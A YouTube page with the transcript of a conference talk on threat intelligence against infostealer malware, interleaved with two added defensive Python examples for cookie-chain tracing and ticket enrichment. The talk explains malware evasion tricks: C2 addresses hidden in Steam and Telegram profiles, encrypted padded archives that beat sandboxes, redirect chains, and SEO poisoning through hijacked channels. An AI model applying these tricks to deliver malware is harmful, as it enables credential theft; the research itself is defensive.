
Threat Intelligence Strategies Against Malware

BSides Mumbai · 49:15 · 173 views · Published 2025-03 · Watch on YouTube
Category: Technical
Style: Talk
About this talk
BSides Mumbai 2024 - Expert Talk on Threat Intelligence. Join Pavan Karthick and Abhishek Mathew as they dive deep into Threat Intelligence Strategies Against Malware Threats. This session covers:
- Understanding modern malware threats
- Effective threat intelligence frameworks
- Proactive defense strategies for organizations
- Real-world case studies & attack trends

Speakers:
- Pavan Karthick - Cybersecurity Researcher. LinkedIn: https://www.linkedin.com/in/e11i0t/
- Abhishek Mathew - Threat Intelligence Specialist. LinkedIn: https://www.linkedin.com/in/sh4d0wdr4g0n/

Event: BSides Mumbai 2024
Topic: Threat Intelligence Strategies Against Malware Threats

Follow BSides Mumbai: Official Website: https://www.bsidesmumbai.in/ | LinkedIn: https://in.linkedin.com/company/bsidesmumbai | Instagram: https://www.instagram.com/bsidesmumbai/ | Twitter/X: https://twitter.com/BSidesMumbai | WhatsApp: https://chat.whatsapp.com/FOLa4NT7zHQ7AoDx4CgwEa | Discord: https://discord.gg/2KRGQWBGR3

Transcript [en]

So how has the day been for you guys? Are you excited for the presentation, or are you bored till now? Excited, right? So let's begin with our presentation, Threat Intelligence Strategies Against Malware Threats. So before we even jump into our introduction, let's see how many of you guys are actually working professionals. Oh wow, I expected a lot more, but it's fine. And how many of you are students? Yes, there are a couple of students too. So if you are students, some of the concepts and the words themselves will be too complex for you. I'd say keep your phone ready, Google it and then note it down if you like, and that's how we'll keep it very interactive.

I mean, in the sense that we'll be presenting a lot of case studies explaining what we did. So let's jump in. I am Pavan Karthick, I'm a threat researcher at CloudSEK. I just graduated last year, and then it's been one year of full-time experience for me. I do a lot of malware research; not a reverse engineering kind of guy, but I do malware research, and at the end of the presentation you'll know what kind of research I do. I also do CRQ: at CloudSEK we are building something new, so I'm learning cyber risk quantification. Apart from that, threat intel, that's the main role; even my name contains it. And I do a

lot of automation. For a security professional, I feel all of you might have a coding phobia also, so I'm also that kind of a guy: whenever I do coding I use a lot of ChatGPT and Stack Overflow, who doesn't, right? And then Abhishek. Hello, I am Abhishek. I do work at CloudSEK; I specialize in OSINT and HUMINT. So this is just a disclaimer for corporate folks: whatever we show here, it's not a straightforward solution for whatever you guys are implementing right now. If you're in a SOC role, or if you're in a malware research role, this will help you do research in a very unconventional way, and

then to fully benefit from it you have to go back home, check what we have presented and then do more research about it; only then will you get the full experience out of this. And then, right now, most of you would have known about the IBM cyber threat report, which was released very recently, right? So according to IBM, there's a 70% increase in usage of stolen credentials. So in 2023 there was little use of stolen credentials, they were still there, but it increased by 70% now. And then out of all these hackers, 32% of the people who were involved in ransomware activity preferred stealing and selling the credentials instead of doing ransomware activities. That's crazy, right? They're

moving away from ransom because there are a lot of policies which companies are implementing; even if they get attacked they have fail-safes to get back up, and then ransomware... so that's why they're moving away from that. And then the last one is straight-out crazy, because there's a 266% upsurge in usage of infostealers. Have you guys all heard of infostealers? In simple words, a virus which steals your password is an infostealer. And then the number of families, the number of strains of malware, the number of types of malware, is 97 families. So there are 97 types of malware, and then every strain has a different variant of it again. So it's

like your code: if you have Chrome OS, sorry, the Chrome browser, it'll have different versions of it, right? Similar to that, it'll also have different versions of it, and then there are multiple families of the same malware. And then this is one more screenshot from the same IBM report. Here you can see that from last year, which was at 16%, it rose by 14% this year, which is basically the usage of valid accounts. So valid accounts: for a cyber criminal activity to be done, they need initial access, right? So how do they get the initial access? When you do VAPT you try to search

for exploitable public applications, so that is in third place, which is 29%. There are two others above it, which are phishing and valid accounts. So how do they get valid accounts? Because of the malware: malware steals the information, and if they find the credentials valid they will be utilized in cyber criminal activities. And then there is phishing; phishing was actually reduced from 41% to 30%. You'll understand more in this slide. So this is basically how malware spreads, right? These are called initial infection vectors; it's basically how the malware was delivered to you. Malvertisements, one: basically you see ads everywhere, right? You might

have been seeing them. So my dad sees Facebook ads by Mukesh Ambani to invest in some stocks, so this is a kind of malvertisement only, right? And then from Q2 2023 it's a straight line up, it's like a 250% increase in malvertising. So what does that mean? Every Google search you do, I mean every day you use Google, right? Every Google search you do, if you're searching for anything free, there is a slight chance that what you find is malware. So that's how in Q1 2024 79% of the whole malware delivered is from malvertisements. Malspam, all these are almost not helpful for cyber

criminals, because for malspam every organization has their own phishing detection tools and they also give a lot of employee training, so that also gets prevented. So now we know what the infection vectors are, and then the top 10 malware from the last quarter. So SocGholish is one; I mean, if you ask me to speak I can speak for hours about SocGholish, but it's a simple malware which is a browser-based one. It uses JavaScript injection, so think about it as malware using your browser to hack another website itself. So it's basically trying to brute force other WordPress sites. But how do they brute force it? For every brute

force attack there is rate limiting which you can do, right? If you rate limit from that IP, it's preventing DDoS, or actually DoS; you can't brute force or use the same or different passwords, there's a certain limit for that. But every person who opens a compromised site, like any WordPress site, it uses your browser's network to basically send brute force requests to other sites, so that it's like a chain: one site gets compromised, and until the owner of that site comes to know that his site got compromised, they'll keep trying to hack other WordPress sites. So do any of you know that WordPress has a vulnerability of user enumeration? Anyone

knows? You guys know, right? So WordPress, that user enumeration gives them usernames. So I came from a CTF background, so the first box which I did was something related to Mr. Robot, and that Mr. Robot box also had something similar to that: he needs to get a username, and once he gets a username then he tries to get a password. So SocGholish is one type of malware which does that, and then what do they drop? They drop anything from a normal adbot to ransomware, so it's that crazy. 60% of it is just a dropper; a dropper is basically, it's like giving the payload and going. And then there are a lot of anti-detection

mechanisms. So a lot of EDR/XDR folks might know this word: if you upload a malware to VirusTotal or any AV or something like that, it'll detect if it is malicious or not, right? But these people, even though it's detected as malicious, they won't actually get the final sample which it is supposed to execute, because it has coding break points which will be set, like it checks if there is a specific, let's say, Windows policy enabled, then don't execute, because they have a higher chance of getting detected. If it gets detected, all the researchers will write rules to prevent that same sample from getting executed,

so they have a lot of such fail-safes also. And then one interesting thing: they use, all of you would have known C2, right, C2 infrastructure. So they use Steam, Telegram; you have your own usernames, right? They inject, I mean they just give their IP addresses there, and then whenever the malware executes it doesn't reach directly to the IP; it checks Steam, it checks Telegram, and in that Telegram the actual malicious IP address is there. So basically if that actual C2 is taken down, that Telegram account is still there, that Telegram account can change its names, so in that way they use fail-safe C2s also. And then

those are all the tactics, and then these are all some malware. So CoinMiner is mining malware, and then NanoCore is a botnet; a botnet is used for DDoS again, and then a lot of other stealers. And now you know what's happening in the actual threat landscape, right? It's full of malware. How do you protect yourself from these? There are a lot of actual solutions provided for your organizations, like XDR, EDR; you have your own SOC teams which keep monitoring all this stuff, but I feel like most of the time it will be reactive. Some do proactive; I'm not saying no one does proactive, there is proactive, but most of this presentation

is to basically urge you to move to proactive research. Now coming to cyber threat intelligence: how many of you know how many types of cyber threat intel there are? Anyone? Okay, there are two types. One is internal CTI. Internal CTI is basically, let's say you have a firewall; how will a firewall detect if there is anomalous behavior or not? Very simple. You guys know about the Bangladesh Bank heist? How did that happen? In the off time there were login attempts, so internal CTI detects there were off-time login attempts and marks it as anomalous behavior. So you have access to all your internal telemetry. At one point you might have heard of SIEM and SOAR

solutions; they pull in all the data and you get insights out of it. So that is internal CTI, and then detection of insider threats. I've heard the previous speaker speaking about insider threats, so here, how do they detect insider threats? How does internal CTI detect insider threats? Any idea? Like, what would an insider like to do? He wants the juicy information, he wants the trade secrets, all these things, right? So how does he get all these? There are certain parts of any company's infrastructure which are very restricted, right? If any request goes into that, all of that should be monitored. If there is any malicious or anomalous activity which is out of line, that gives you

these kinds of information. So basically having SIEMs or XDR, EDR, all these set a baseline for you to say this is how it normally is; if it deviates from this format or from these patterns, just alert me. So those are the anomalies, and that's how internal CTI finds out there is an upcoming threat; it's basically predicting that you will be attacked. And then finally, misconfigurations and vulnerabilities. You have a whole list of... I think there is something called SBOM, so each and every application which you build will have that SBOM; you know the versions of each and every application which you internally use, so with those you can try to find out misconfigurations and

vulnerabilities, common misconfigurations. So a very simple example: there was one Microsoft SSO bypass, an OAuth bypass. Does anyone know about that? It's a very simple bug; you can basically sign in as any user. It's not even a bug, it's a feature which they implemented. Anyone knows? So there are two types of email ID in Microsoft's Active Directory. One is the principal ID; the principal ID is that unchangeable thing, it's immutable, even if you have AD admin access you can't change it. Then the second one is the actual email, like you can give your personal email, you can give your work email, any email. So what did some companies who implemented SSO

login do? Instead of using this principal ID they used this specific, like, the interchangeable one. So what happened? Anyone can hack or sign in as anyone. So what they did, they basically create their own Active Directory, they give the email as whose account they want to take over, and then they finally will be able to take over if they sign in using their Microsoft account. So you can check about it; it's not my research, someone published it. I found out that the misconfiguration was there and I checked it for other people and then it worked. And that is how, like, it's basically that if you have this

vulnerability there is a chance that this can happen; basically before even the bug bounty people or criminals do that, you'll find it out. And then coming to, like, it's all theory, I'll just skip it. So the next one is external CTI. What is external CTI? So basically we operate in this area; we help companies, internal SOC teams, we provide data. I mean, I'll not make it a sales pitch also; they strictly told us it shouldn't be a sales pitch, so I'll not speak about any of my products or my company's products. So external CTI is basically, let's say your company has a view of your own

environment; you know what all is happening inside, but for you to know what is happening outside is a very hard job. Let's say you want to scrape the whole internet; can you alone do it? Even if your company has money, they need to invest time, they need to invest resources, all these things should be there, and only if it clicks will your own external CTI be there. But there are other vendors who give you external CTI resources, who track threat actors, and then even if you have a specific tech stack they try to give you relevant threat intel, which is like, let's say a new WordPress vulnerability has been released and you use WordPress, they

alert you; those kinds of information external CTI does. And they also track tactics, techniques and procedures, so they are called TTPs. So they track all these TTPs of all the threat actors, whoever is active on dark web forums, etc., APT groups, all these; they monitor how they act. So I'll give you a pretty simple example. There was this guy called Shopify Guy. So what does he use for his... like, he's a cyber criminal, what does he use as his initial access? The name itself says it, right, Shopify Guy: he uses Shopify, and then he steals data and he sells it. So this is very simple, but most of the threat actors will have that

kind of identifiable usernames and all, so you'll need to check what all tactics they use when they infiltrate your systems. Like, you'll have honeypots; honeypots actually detect these kinds of anomalies, and that will help you in future investigations. And then practice proactive defense; so this is basically having honeypots, having those red team/blue team activities, so this will help you to understand how to act when there is an actual cyber threat. And then finally, the threat landscape is always changing; internally it is very hard to monitor, but externally vendors who provide external CTI are able to do this. And then, as my presentation itself is about malware, we'll just cover what is external and internal in

terms of malware. So the source of external CTI: it's gathered from outside the network, so it could be from other companies' telemetry which is provided by your XDR, EDR, and then there are a lot of sources like MalwareBazaar, there is Malpedia; all these give samples for a specific strain of malware. And then internal CTI: so these are any anomalous detections; like you have an agent sitting in each of your systems, right? So these are generated within your network. And then data: so external CTI is malware samples, indicators of compromise, there are threat actor profiles, TTPs, all of what they do; and then for internal CTI it's security alerts which are generated and

moved to your SIEM, and then there are logs, malware analysis results; so all these things are considered to be internal CTI. And then purpose: external CTI is an early warning; even if you are not vulnerable, it'll warn you that you have this tech stack, do something to protect it. And then for internal it is basically after an incident happens you need to detect; like, it's part of detection, investigation, containment and then remediation. And then finally, the example for this I think I've already covered. So for external it is threat feed warnings of a new ransomware; so basically there will be feeds which say there is LockBit who is targeting the banking sector now, so now you'll know

that, oh okay, I need to see what LockBit is doing, I'll need to see if the same things are there for me or not. A very simple example, guys: so a ransomware group last year, there was Cl0p ransomware. So what Cl0p used to do was, there was something called MOVEit as a vulnerability; so once the MOVEit vulnerability got released, every single activity of theirs was tied back to MOVEit, so if you had MOVEit you were vulnerable. And then, I mean, I don't even know why nearly 200 companies got compromised because of Cl0p. So external CTI helps you in those kinds of things. And then internal CTI: IDS flags a malware download and

then it basically ensures investigation. So malware download: I don't know how people download malware in a corporate environment; even I, when I do malware research... so just a disclaimer, I got compromised when I was in college. I used to play a lot of games, I used to download pirated games; please don't record this and put it anywhere, but I got compromised. When did I know that? So there is no company which actually provides individual dark web monitoring, but Google, they have that Gemini Pro which got released and I purchased that, so then I came to know that they have this feature called dark web monitoring, and then it showed that I got compromised by infostealer malware only, like

back when I was in college I didn't know about all of these things, but those kinds of detections... I didn't have any antivirus; even if I had antivirus, the game only tells you to turn off your antivirus, otherwise your game is not installed. So people do that, and I've seen it a lot of times in actual corporate environments. So those kinds of things, IDS, you can't turn it off, your IDS has the admin privileges, so IDS will flag those and then you'll basically train them again saying why do you do this, do it in your own personal systems, and even if you do it in your personal system your corporate credentials shouldn't be stored in your personal

system. So those are actually the things which happen, so those are the things which we were discussing. And now let's discuss the real stuff: all the case studies which we did and the malware tactics we researched. So the things to cover: first, how malware is delivered using SEO poisoning, as discussed; so I'll show you how we detected a huge campaign on YouTube, and how we stopped it also with collaboration from an international agency. And then the second one is tracing the malware logs for the source of infections. Now all these infostealers, right, they sell that information; even if you get that information you still need to understand how they got

compromised; that will help you to prevent such things from happening again. So that also we'll see, and then there is one more research, ClearFake; so this was one malware strain researched by Sekoia; we did some more investigation on top of that which led us to some good findings, and that also we'll be presenting. And finally Abhishek will be presenting about human-driven research, how it helped us crack a big TTP which malware was executing, and then finally we'll see how dark web research will help you in, like, fast-tracking your research. So, SEO poisoning: it's just simple, you can see the screenshot where some videos have been posted. So this is an AI-generated video, and this is

for Photoshop; here you can see the name also, and then some premium proof software, and then all of these have like 5,000 views, 3,000 views, 4,000 views. And then which channels posted this? It's not actually new channels; see, some "suar with prti", I don't know Hindi, but this seems to be an actual legit channel, and then Dakar Media, so it is also some foreign channel, and MMA Talk; so MMA is that fighting organization, I guess. So all these channels, how did they get compromised? There was one campaign which was happening just to compromise YouTube channels and use those YouTube channels to post videos, so that was how they initially targeted. SEO: so when you post

YouTube videos and have specific keywords... anyone from a marketing team here? No one, okay. So basically they have tags and all, they put a lot of tags in the video description, right? So they use that for SEO, and then why is it called SEO poisoning? They poison the actual results. So when you search for Adobe, adobe.com should be first, not a malware, right? So they do SEO poisoning, and there was one situation where actually a malicious site was on top of Ari; imagine how critical that is. A lot of people who are, I mean, over-aged or who don't know tech, they click on the first one they see, and if the first one doesn't work,

second one, third one, fourth one, all of them are malware, and they get infected multiple times. So that's how SEO poisoning is, and the statistics of it for YouTube: so in approximately 2 months we tracked nearly three lakh videos getting posted. So three lakh videos is a huge number, and from those three lakh videos there were 800 unique malware samples which got detected, out of some 10 malware variants. So even in those 800 samples only 10% of them actually got detected by a sandbox, so that means there are 90% of them which escaped; I mean, escaped in the sense that they prevented detection at all, but they are still malware. How do I know?

Because I use very specific keywords to track them. So let's say YouTube was there; in the previous slide you can see the keywords are "free download", "Adobe Photoshop free download", "no crack", "illegal", and some keywords like that. What did I do? I used YouTube search for those specific keywords; you know Google dorking, right? Use Google dorking, and using those keywords you'll be able to get all the videos themselves. And then you might say there might be false positives, but who gives you free stuff away for free? And even if it is free stuff, they take it down because it's actual premium software, right? So that's how it was, and in 2

months it gathered nearly one crore views. Of one crore views, let's be very optimistic, let's say only... not even one lakh, let's say 10,000 people saw it... I mean, one crore views means everyone saw it, but let's say only 10,000 people downloaded it and then installed it. Even that 10,000 is enough for them. YouTube accounts: in that 10,000 how many will be there? 100 more. And then all of these, it's like a domino effect: you get infection, there is reinfection, and then they compromise YouTube accounts, your Gmail, everything, whatever accounts you have passwords for, all of them get compromised until the user actually notices them, and

then they use them to run their operations again. So their investment is giving them returns, and it's rotating again and again. And yeah, this is one more: so I just searched "free antivirus crack download Avast", without "Avast" and without "YouTube". Interestingly you see LinkedIn here; LinkedIn is supposed to be professional, but yeah, when someone's LinkedIn account gets compromised, that also gets involved in SEO poisoning. So that is one, and then there are other websites which actually are malicious but they are not abusing any service; they're just putting out websites, everyone can put out a website, and then they still use SEO to get that on top of everyone else. So now, tracking SEO poisoning:

how do you track this? Now you know what SEO poisoning is; how do you track this? So first step, there are two paths: source abuse and individual links. Source abuse is easy to track. Why do I say that? YouTube has its own APIs which you can use; every day it gives you 10,000 free searches, so using that you can track what all videos were posted and you can do all your coding stuff to process that. And I mean this part, I told you it is easy, but to prevent detection they can go to any extremes also, so you need to understand what patterns they use. And you know, once you click on a website

or any link or any ad also, you get redirected multiple times in a span of seconds. Why does it happen? So that... I mean, I'll tell you one thing, you go and try it out at home. So Google, when you use the Google browser, there's something called Safe Browsing; it shows "deceptive site ahead", think about it before you go forward, right? So when you see that screen, actually what happens in the back end is every single request, your history, gets sent to Google. So for that history part there is a certain limit, and those redirects are to prevent that final site which actually serves the malware from getting, like, to be

undetected, basically. And then there are individual links, those other sites which I showed, right, individual websites; those are kind of hard, but still they can be detected. And then you just look over source by source. I did YouTube; you guys can take up other sources. I'll give you examples also: GitHub is getting abused, SoundCloud is getting abused, Docker Hub is getting abused, all of these things. What do they do? Whenever you create a repository in GitHub or create, let's say, an image in Docker, it gets indexed on Google for people to search for it, and when people search for keywords like "Adobe free crack download" these things will come up. So that is

source by source: use the sources' APIs, or use something called Custom Search Engine. So to crawl the internet you need not create multiple... like, you need not know how web crawling works and all; you can just use APIs, they have their own documentation, you can use them. But these are not free, you'll have to invest some money in it, but they give a free trial also, Google basically. And then this is Google Custom Search Engine: you can give sites to search, sites to exclude, a lot of things, and basically it's a programmable search engine; you can give a specific search query, the number of queries you want to crawl, all these

things you can customize, and that's how. And YouTube also has that same search API, search.list; so all these have API keys, it's not directly free, but you can still use them. And basically because of that YouTube search API I got this. So here, I'm not sure if you are able to see, there are 347 videos in one crawl; that too for how many days? Just for one day. I mean, I used to run the same script four times a day, and every time I used to get 500-600 videos at one certain point of time, so it was daily 2,000 malicious videos, all promoting... I mean, you can see patterns

also there, using that same... so here you can see two different videos with the same name, so all these are again from different channels. So that's how the search API gives you data. So this data, how do you even consume this data? You get malicious video URLs, initial drops from the description. I mean, in the video I don't think I've shown a description, but in the description they used to have a link; only when you click on that link does that malware get downloaded. So those links you get, and then you follow the trail: once you click on the link, where does it redirect,

from where does it actually download the sample? It's not from their own server; they are so, I mean, intelligent: they use MediaFire, they use Google Drive, they use Dropbox, all these free file-serving services, and they use encryption; they actually give it as encrypted zips. So why do you use encryption? Encryption is basically, it's like when you upload something to VirusTotal, right, unless and until it is actually an exe it will not run it and do dynamic analysis and all. If you give them an encrypted zip they won't know the password, so initial detection will be swayed away; only after you decrypt it, using the password in

the description itself, do the antivirus checks come in. But again, those samples, a 10 MB archive, when you extract it, it becomes an 800 MB executable. How? They just put in junk, so that... there is a limit on how much you can upload to a sandbox also, like 250 MB, something like that. So they make it very big so that the download is easy but execution is also easy. And then there is an anti-detection mechanism which they're using too, and then finally, if you do reverse engineering and if the sandbox works properly, you get C2 servers and then all the other malware indicators. So how do you use this

stuff? Like, I don't talk about IOCs here; you also know how to use IOCs, you just put them into the EDR and it works. But how do malicious video URLs help you, or how do initial drop URLs help you? So it's a list of URLs, right, and you have content blocking, like content filtering, in your firewalls itself; you give the list of all these to your content filtering and it'll straightforwardly block it. So one suggestion here: when you say YouTube is getting abused, you can't completely ban YouTube from your internal firewall network, right? People still use YouTube to watch some educational videos or something, but I saw this new feature in

basically Microsoft Edge where you can block a very specific URL; like if you go to Mimikatz, it's a red teaming tool on GitHub, when you go to Mimikatz Edge blocks it, but if you visit any other GitHub repository it still lets you view it, right? So that level of, like, very granular content filtering which you need to have, that will help you a lot. And the second one, basically, once you get... I was telling you malware logs are being sold, right? So from those you can still find out how the user got infected. One thing is browser history; from browser history you know what he

downloaded. From cookies: you know cookies are stored in a hierarchy, right? You visit Google, you visit YouTube, all those visited sites get layered on top of each other like a stack, and when malware exfiltrates, it exfiltrates in the same way. So when you are trying to detect how someone got compromised, you look at the end of the, like, infection cookie, sorry, not infection cookie, the exfiltrated cookies, and you'll find the actual malicious websites which are present. And then search for pirated content, like search for software, search for cracks, all these things, and you'll actually find helpful stuff to detect how the infection happened. And this is how a log looks; here

you can see Google Chrome's autofills are exfiltrated, and these are two strains of malware, but here you can see autofills, cookies, file grabber. So you can see some internal document, docx, code.txt, important autofills, passwords, process list, user information. So all this information basically creates a user fingerprint. Like, do you think if I give you my Gmail username and password you can directly get in? No, right? Google has certain measures to stop you from even signing in, because they have MFA, 2FA, browser fingerprinting, like "you have signed in from a new device, just sign in again", all these things they have. So this information they take, so that

they have multiple other techniques; I'll not dig deeper into them. They have techniques to basically even bypass those: the browser fingerprinting is from the user information. And then, as I told you, you can look at cookies and you can see how they actually got infected. So this is one cookie example. Here you can see google.com, okrush.com, and then again google.com, and then there is something called curentpc.com. So this is an actual malicious site which we noticed earlier, and this was the one which was actually serving malware. And then finally scloud.ws: this was the place where the final payload was downloaded from. So just by analyzing cookies from that specific

log we were able to understand how he got infected. So it's basically breadcrumbs left in, and threat intel is basically you investigating it, combining all the dots and understanding what happened. I mean, you'll actually feel like Tony Stark in that blast scene: he'll redo everything and then he'll see from where the bullet came, or who blasted something, like that, right? So you'll actually feel that way if you actually do the stuff. And then finally, a one-time investigation is fine, but if you're in a service-based company you need to do the same thing again and again and again. But you know there's a pattern in it, right? So you can automate everything
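The cookie "stack" idea above, as an added worked example (this is not the speakers' code): the stealer writes cookies in the order the browser layered them, so reading the dump from the last entry backwards, skipping known-good domains and flagging piracy keywords and download paths, reconstructs the hops to the final payload host. The cookie dump, the allowlist and the keyword list are all constructed for this example; the format is the common Netscape tab-separated cookie file.

```python
"""Reconstruct an infection chain from an exfiltrated cookie dump (added example)."""
import re
from dataclasses import dataclass

# Constructed sample in Netscape cookie-file format:
# domain, include_subdomains, path, secure, expiry, name, value
SAMPLE_COOKIES = """\
.google.invalid\tTRUE\t/\tTRUE\t1900000000\tNID\tabc
.youtube.invalid\tTRUE\t/\tTRUE\t1900000000\tYSC\tdef
.google.invalid\tTRUE\t/\tTRUE\t1900000000\tNID\tghi
free-software-cracks.invalid\tFALSE\t/\tFALSE\t1900000000\tsess\tjkl
cdn-dl.invalid\tFALSE\t/download\tFALSE\t1900000000\tdl\tmno
"""

# Constructed allowlist of domains that appear in nearly every dump and carry no signal.
ALLOWLIST = {"google.invalid", "youtube.invalid"}
# Constructed keyword list for the "search for cracks / software" step from the talk.
PIRACY_TERMS = re.compile(r"crack|keygen|torrent|warez|free-software|activat", re.I)


@dataclass
class Hop:
    domain: str
    path: str
    flagged: str  # why this hop is interesting, "" if it is not


def parse_cookie_dump(text):
    """Yield (domain, path) in file order, tolerating comments and damaged lines."""
    hops = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) < 7:
            continue  # malformed line: skip it rather than crash on a dirty log
        hops.append((parts[0].lstrip(".").lower(), parts[2]))
    return hops


def infection_chain(text, allowlist=ALLOWLIST):
    """Return the non-allowlisted hops, most recently exfiltrated first."""
    chain = []
    for domain, path in parse_cookie_dump(text):
        if domain in allowlist:
            continue
        reason = ""
        if PIRACY_TERMS.search(domain):
            reason = "piracy keyword"
        elif "download" in path.lower():
            reason = "download path"
        chain.append(Hop(domain, path, reason))
    chain.reverse()  # the stack: last cookie written is the last site visited
    return chain


def defang(domain):
    """Render a domain safe to paste into a ticket."""
    return domain.replace(".", "[.]")


if __name__ == "__main__":
    for hop in infection_chain(SAMPLE_COOKIES):
        print(f"{defang(hop.domain)}{hop.path}  {hop.flagged or '-'}")
```

The output reads from the payload host back to the piracy site that started the chain, which is exactly the order an analyst wants when writing up how the user got infected.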

and then basically it helps you. So this is one enormous project which I took up for tracking that whole YouTube campaign, all the statistics and all. It was not anyone's research, it was my research; I already published the paper about it, but I'm just telling how I did it. This is the first time I'm presenting it. The parts of it are in four different parts. One is the YouTube scraper; you know how the YouTube scraper I've showed you... and then I get video URLs, video metadata and unsorted URLs, and I stored them in a database. And then the second one was source-of-infection detection. I'll not showcase any code, but you just know how

I did that, right? You need to automate it, and then you basically get the final delivery URLs from it. And then from there there is one specific module which I wrote, the malware sample hunter; so it's a proud name which I've given it myself, and my code. What it does is basically, I told you, right, when you click on one website it continuously redirects you to multiple others, and sometimes you need to click, and there's a lot of redirection which happens. So that is basically aiming to solve that redirection issue and actually get that malware downloaded. So it's basically a cat-and-mouse game: you find out that

they're using one tactic, you go behind them and solve that, and then they'll be at the next step, which is implementing a new one to basically go ahead of you, right? And then basically, once the malware samples are downloaded, the next step is sandboxing, which is basically you have your own sandbox, so that when you upload those samples you'll see if they are getting detected or not. And the most important step in this sandboxing: you shouldn't use existing sandboxes like VirusTotal, Triage or something like that, because when you upload into actual real sources, threat actors will know that they're getting tracked. Even here they somehow found out that they were tracked. But they will

know that you are tracking them, and then they'll try to completely move away from that tactic itself. So you'll need to covertly do all this investigation. It's a mind game on the whole; you need to understand how they think so that they don't detect that you are doing something. So yeah, and every day it runs this same script and it gets all those samples and statistics which I showed. And basically, as I told before, I hate coding, but I still do it with the help of ChatGPT and stuff. But recently I found out this very interesting tool called n8n. So, does anyone know this? Oh wow, actually someone knows this.

So I'll say this is the best thing which ever happened. Every small script which I need to write, without coding it helps you automate stuff. So getting data from sheets: how to extract data from Google Sheets, that's still hard, right? You need to go through multiple documentations. They have one node like this, like one Jira issue; so here it is Jira issue, but they have multiple other things, you can check it out. And basically this one enriches the security incidents. How does it do so? In a Jira ticket, let's say you have automation which is creating Jira tickets to have some hash in it, so you check, extract IPs and domains

from the sample, and then you upload them to urlscan (you all know urlscan, hopefully; if you don't know, just look it up, okay), and then there is VirusTotal. To both of these you upload the domains and you get both the reports; you merge the reports and then you basically update that ticket. So this is common data enrichment. I mean, the computer science students might know data enrichment is a keyword they use in data science, so it's something like that. And then this is a very simple one, but this whole workflow which I showed can be implemented in that; you just need to understand what all features are available in it. And the next one: the ClearFake
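The enrichment workflow just described, written out as an added Python example rather than an n8n flow (this is not the speakers' code): pull IPs, domains and hashes out of the ticket text, look each domain up, merge the two reports into one verdict and produce the comment to post back on the ticket. The two HTTP helpers call the real urlscan search API and VirusTotal v3 domain endpoint and need API keys; the lookups are injected as functions so the script runs offline against the constructed sample responses below. The ticket text, ticket number, domains and verdict thresholds are all constructed for the example.

```python
"""Ticket enrichment: extract IOCs, look them up, merge the reports (added example)."""
import ipaddress
import json
import re
import urllib.request

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b", re.I)
FILE_EXTENSIONS = {"txt", "docx", "xlsx", "pdf", "exe", "dll", "zip", "rar", "js"}
# Only RFC 1918 / loopback / link-local are dropped, so documentation addresses
# such as 203.0.113.x survive and the constructed sample below can be processed.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Constructed ticket text; the hash is SHA-256 of an empty input, used as a placeholder.
SAMPLE_TICKET = ("INC-0000 (constructed): EDR flagged outbound to 203[.]0[.]113[.]9 and "
                 "hxxps://update-chr0me[.]example/dl/setup.zip from 10.0.0.5; payload sha256 "
                 "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")


def extract_iocs(text):
    """Pull routable IPv4s, domains and SHA-256 hashes out of free-form ticket text."""
    text = text.replace("[.]", ".").replace("hxxp", "http")  # undo analyst defanging
    ips = set()
    for candidate in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # e.g. 999.1.1.1 matches the regex but is not an address
        if not any(ip in net for net in INTERNAL_NETS):
            ips.add(str(ip))
    domains = set()
    for d in DOMAIN_RE.findall(text):
        if d.rsplit(".", 1)[-1].lower() in FILE_EXTENSIONS:
            continue  # "setup.zip" looks like a domain to the regex
        domains.add(d.lower())
    hashes = {h.lower() for h in SHA256_RE.findall(text)}
    return {"ips": sorted(ips), "domains": sorted(domains), "hashes": sorted(hashes)}


def urlscan_domain_scans(domain, api_key):
    """Real urlscan.io search endpoint: public scans that touched this domain."""
    req = urllib.request.Request(f"https://urlscan.io/api/v1/search/?q=domain:{domain}",
                                 headers={"API-Key": api_key})
    with urllib.request.urlopen(req, timeout=20) as resp:
        return json.load(resp).get("results", [])


def virustotal_domain_report(domain, api_key):
    """Real VirusTotal v3 domain object."""
    req = urllib.request.Request(f"https://www.virustotal.com/api/v3/domains/{domain}",
                                 headers={"x-apikey": api_key})
    with urllib.request.urlopen(req, timeout=20) as resp:
        return json.load(resp)


def merge_reports(domain, scans, vt_report):
    """Combine the urlscan scan list and the VT report into one verdict record."""
    stats = vt_report.get("data", {}).get("attributes", {}).get("last_analysis_stats", {})
    flagging = stats.get("malicious", 0) + stats.get("suspicious", 0)
    urls = sorted({s.get("page", {}).get("url", "") for s in scans} - {""})
    if flagging >= 3:           # constructed threshold, tune to your engines
        action = "block"
    elif flagging or scans:
        action = "review"
    else:
        action = "no-data"
    return {"domain": domain, "vt_flagging_engines": flagging,
            "urlscan_public_scans": len(scans), "urlscan_sample_urls": urls[:5],
            "recommendation": action}


def enrich_ticket(text, urlscan_fn, vt_fn):
    """Enrich every domain in the ticket; lookups are injected so tests run offline."""
    iocs = extract_iocs(text)
    enriched = [merge_reports(d, urlscan_fn(d), vt_fn(d)) for d in iocs["domains"]]
    comment = "\n".join(f"{e['domain']}: VT {e['vt_flagging_engines']} engines, "
                        f"urlscan {e['urlscan_public_scans']} scans -> {e['recommendation']}"
                        for e in enriched)
    return {"iocs": iocs, "enrichment": enriched, "ticket_comment": comment}


# Constructed offline stand-ins shaped like the two real API responses.
def offline_urlscan(domain):
    return [{"page": {"url": f"https://{domain}/dl/setup.zip"}}]


def offline_vt(domain):
    return {"data": {"attributes": {"last_analysis_stats": {"malicious": 7, "suspicious": 1}}}}


if __name__ == "__main__":
    print(json.dumps(enrich_ticket(SAMPLE_TICKET, offline_urlscan, offline_vt), indent=2))
```

To run it live, pass `lambda d: urlscan_domain_scans(d, KEY)` and `lambda d: virustotal_domain_report(d, KEY)` instead of the offline functions; the merge and comment logic stay the same, which is the point of separating lookup from decision.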

